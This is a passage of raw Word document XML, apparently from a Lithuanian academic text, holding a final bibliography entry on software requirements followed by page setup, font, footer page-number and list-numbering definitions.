          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">57. </w:t>
      </w:r>
      <w:r w:rsidR="0082791D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Wiegers E. K. (2005). </w:t>
      </w:r>
      <w:r w:rsidR="0082791D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>More About Software Requirements</w:t>
      </w:r>
      <w:r w:rsidR="0082791D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. Microsoft Press.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009D6E00" w:rsidSect="00A05FD8">
      <w:footerReference w:type="default" r:id="rId276"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="567" w:right="567" w:bottom="567" w:left="1418" w:header="284" w:footer="284" w:gutter="0"/>
      <w:pgNumType w:start="1"/>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6E00" w:rsidRDefault="009D6E00" w:rsidP="00327C69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00327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OpenSymbol">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="1001ECEA" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001"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BA"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Myriad Pro Light">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000287" w:usb1="00000001" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DejaVu Sans Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000000" w:usb1="D200F9FB" w:usb2="02000028" w:usb3="00000000" w:csb0="000001D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6E00" w:rsidRDefault="009D6E00" w:rsidP="00730126">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="006637E8" w:rsidRPr="006637E8">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
      <w:t>2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6E00" w:rsidRDefault="009D6E00" w:rsidP="00327C69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00327C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75pt;height:16.5pt" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="artCE15"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="02785A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB2EC65C"/>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94C4973"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA5A1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99638F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7940218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DD42DDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF0C8A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E5620CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA7A779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0AE090D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BECC2970"/>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11F4686B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AF07C9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41A6C39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42F41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84C582C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65141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456D4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="835CE34A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="21C96767"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="497CAFB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53D48BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA5A1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90397A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF5E7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B2502"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40AEE656"/>
    <w:lvl w:ilvl="0" w:tplc="389E7D46">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="717" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40240E38">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1437"/>
        </w:tabs>
        <w:ind w:left="1437" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%3)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1460"/>
        </w:tabs>
        <w:ind w:left="1460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F424C248">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2877" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:r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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="290B3E92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB4609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C47F9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DEE4BE4"/>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2E595A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C9A50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FA7C2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C01C764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302E19F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CAF4835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B54D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="054C8422"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="928"/>
        </w:tabs>
        <w:ind w:left="928"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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37951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500"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FE14DDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35C07CEE"/>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0BD592B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DA024EE"/>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16C2120"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="099AC3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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45C1454C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA5A1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1526C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4ACF9B6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1211"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86B031F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA6684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rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:i/>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874582E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB2EC65C"/>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9D955A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49324F4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4CCD0797"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBB6C09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51B3011D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDCC47E2"/>
    <w:lvl w:ilvl="0" w:tplc="DBB8A12E">
      <w:start w:val="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523E560B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5980DC7A"/>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53A52981"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAA80B6C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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61D4B87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E4CB6D8"/>
    <w:lvl w:ilvl="0" w:tplc="FC60926E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F9443EEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="01BCFEDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2AAA0E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C69A858A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3960"/>
        </w:tabs>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A7421D52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3702A0FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5400"/>
        </w:tabs>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5E6E183E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6120"/>
        </w:tabs>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7C3C695A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6840"/>
        </w:tabs>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="569D1C69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="555AED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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58DB0CF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB2EC65C"/>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AE6AD6D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5AE6AD6D"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5AE6DFF0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5AE6DFF0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BC67B5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA5A1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FAE6FE3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5AE6AD6D"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="617927E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8948F94A"/>
    <w:lvl w:ilvl="0" w:tplc="04090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="62412A82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA5A1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1D43B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2814F8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5A665BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0178BB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669077D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8D635E0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:i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7962028"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C98C9AC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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="69D7238D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="624EE040"/>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6A3A0977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27D2EBBA"/>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6B086BF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C22ED5F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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B7E07B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21B472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BC813BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="773EE5B8"/>
    <w:lvl w:ilvl="0" w:tplc="0427000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5300B8E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CE73828"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36FCC64C"/>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6E102A08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39363AD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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EEC222F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F362C14"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="72DB0EDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6483FD8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
        <w:color w:val="00000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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73C7AF5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBD8A100"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2989"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5400" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7920" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9000" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10440" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="56" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="76D475AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="910CF1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9F21DF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D166DBF0"/>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7C24493A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7761DB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59" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D514DF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7EA25CE"/>
    <w:lvl w:ilvl="0" w:tplc="04270017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>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60" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E90302C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC72994C"/>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41"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="58"/>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4"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="30"/>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7"/>
  </w:num>
  <w:num w:numId="4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0"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="55">
